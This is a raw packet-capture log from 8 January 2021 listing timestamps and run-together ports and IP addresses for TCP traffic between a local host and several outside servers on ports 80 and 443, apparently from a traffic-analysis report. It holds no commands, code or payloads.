                                                        Jan 8, 2021 09:06:20.764178991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764203072 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764220953 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.764250040 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764272928 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764288902 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764303923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764321089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764426947 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764444113 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764460087 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764476061 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764499903 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764563084 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764584064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764642000 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764658928 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764673948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764691114 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764708996 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764724970 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764740944 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764756918 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764770985 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764786959 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764802933 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764822006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764837980 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764853001 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764868975 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764883995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764899015 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764914036 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764930010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764950037 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764967918 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764982939 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764998913 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765014887 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765028954 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765044928 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765059948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765079021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765094995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765110016 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765125036 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765140057 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765155077 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765171051 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765186071 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765203953 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765221119 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765237093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765252113 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765266895 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765281916 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765296936 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765311956 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765330076 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765347004 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765361071 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765376091 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765403032 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765419006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765434027 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765450001 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765465975 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765484095 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.765501022 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.767054081 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.767218113 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.767237902 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.767282009 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.767318964 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.768897057 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.768920898 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.768935919 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.768950939 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769555092 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769573927 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769596100 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769613981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769629955 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769629002 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769648075 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769654036 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769664049 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769674063 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769679070 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769685984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769695997 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769711971 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769730091 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769747019 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769762993 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769778967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769785881 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769795895 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769809961 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769810915 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769826889 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769839048 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769839048 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769855022 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769866943 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769871950 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769889116 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769901037 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769905090 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769931078 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769932985 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.769948959 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769968033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769984961 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.769999981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770015955 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770031929 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770046949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770055056 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.770062923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770078897 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770097017 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770113945 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770128965 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770143986 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770159960 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770174026 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770190001 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.770205021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771096945 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771161079 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771178007 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771193981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771210909 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771226883 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771243095 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.771258116 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.772630930 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.772758007 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.772764921 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.923469067 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923507929 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923527002 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923552990 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923577070 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923602104 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923629999 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923655033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923679113 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923702002 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923726082 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923748016 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923773050 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923798084 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923825026 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923849106 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923872948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923896074 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923919916 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923928022 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.923943043 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923968077 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923990011 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.923993111 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.924016953 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924040079 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924062014 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924083948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924108982 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924133062 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924155951 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924179077 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924204111 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924220085 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.924236059 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924261093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924289942 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924314022 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924336910 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924360991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924384117 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924407005 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924429893 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924453974 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924479961 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924505949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924527884 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924873114 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924932957 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924956083 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.924983978 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925009012 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925031900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925055027 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925079107 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925101042 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925124884 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925148010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925174952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925199986 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925223112 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925247908 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925271988 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925293922 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925317049 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925338984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925364971 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925405025 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925427914 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925451040 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925473928 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.925494909 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.927495956 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.927519083 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.927542925 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.927567959 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.927588940 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:23.957953930 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:23.958008051 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:25.004136086 CET49170443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:06:28.008095980 CET49170443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:06:34.014698029 CET49170443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:06:51.385514021 CET49171443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:06:54.405783892 CET49171443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:00.412210941 CET49171443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:17.665560961 CET49172443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:20.662857056 CET49172443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:26.669255018 CET49172443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:43.892298937 CET49173443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:46.888741970 CET49173443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:07:52.895324945 CET49173443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.115608931 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.180998087 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.181134939 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.185601950 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.251100063 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.254067898 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.254141092 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.254184008 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.254220963 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.272439003 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.338525057 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.555829048 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:10.606515884 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:10.606584072 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:11.647509098 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:11.750526905 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762551069 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762609005 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762639999 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762681007 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762731075 CET44349174195.201.225.248192.168.2.22
                                                        Jan 8, 2021 09:08:11.762825012 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:11.935748100 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:11.975600004 CET49174443192.168.2.22195.201.225.248
                                                        Jan 8, 2021 09:08:11.981884003 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:11.982031107 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:11.983405113 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:12.029421091 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.033199072 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.033230066 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.033318043 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:12.041269064 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:12.087480068 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.100214005 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.179177046 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:12.179240942 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:12.225579023 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:12.225605965 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:13.847610950 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:13.847671032 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:13.847722054 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:13.847769976 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:13.847939968 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:13.884524107 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:13.930749893 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.778067112 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.778105974 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.778172970 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.781555891 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.781598091 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.781640053 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.781651974 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.781668901 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.781749964 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.782198906 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.782241106 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.782488108 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.783284903 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.783329010 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.783664942 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.784360886 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.784420013 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.784491062 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.785458088 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.785501957 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.785803080 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.786521912 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.786566973 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.786849022 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.787600040 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.787640095 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.787727118 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.788686991 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.788727045 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.789694071 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.789803982 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.789858103 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.789904118 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.790812016 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.790853977 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.790961027 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.791896105 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.791945934 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.791996002 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.793008089 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.793045998 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:15.793093920 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:15.794042110 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.000814915 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.019227982 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019258976 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019289970 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019298077 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019387960 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.019439936 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.019826889 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019855022 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.019933939 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.021004915 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.021028042 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.021091938 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.022089958 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.022116899 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.022262096 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.023058891 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.023169994 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.023237944 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:16.024118900 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:16.024152040 CET44349176104.18.58.219192.168.2.22
